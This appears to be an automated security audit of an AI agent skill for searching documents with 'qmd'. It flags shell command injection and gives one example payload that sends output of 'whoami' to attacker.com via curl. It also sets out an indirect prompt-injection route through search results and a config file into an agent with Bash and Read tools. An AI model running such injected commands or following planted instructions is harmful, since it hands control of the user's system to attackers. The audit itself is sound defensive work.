search
Fail
Audited by Gen Agent Trust Hub on Mar 1, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill is highly vulnerable to command injection. It constructs shell commands by interpolating the user-provided
<query>argument directly into a bash string, specificallyqmd search "<query>",qmd vsearch "<query>", andqmd query "<query>". An attacker or a malicious document could provide a query containing shell metacharacters (e.g.,"; curl http://attacker.com/$(whoami) ; ") to execute arbitrary commands on the system. - [PROMPT_INJECTION]: The skill has a significant surface for indirect prompt injection by ingesting untrusted data from external documentation and configuration files.
- Ingestion points: Untrusted data enters the agent context through the output of the
qmdsearch tool (snippets and titles) and the.claude/qmd.jsonconfiguration file. - Boundary markers: There are no boundary markers or instructions to treat the search results as untrusted content, increasing the risk that the agent will follow instructions embedded within the indexed documents.
- Capability inventory: The agent has access to powerful tools including
Bash(for command execution) andRead(for filesystem access), which can be abused if a prompt injection is successful. - Sanitization: No sanitization, escaping, or validation is performed on the data retrieved from search results before it is presented to the agent.
Recommendations
- AI detected serious security threats
Audit Metadata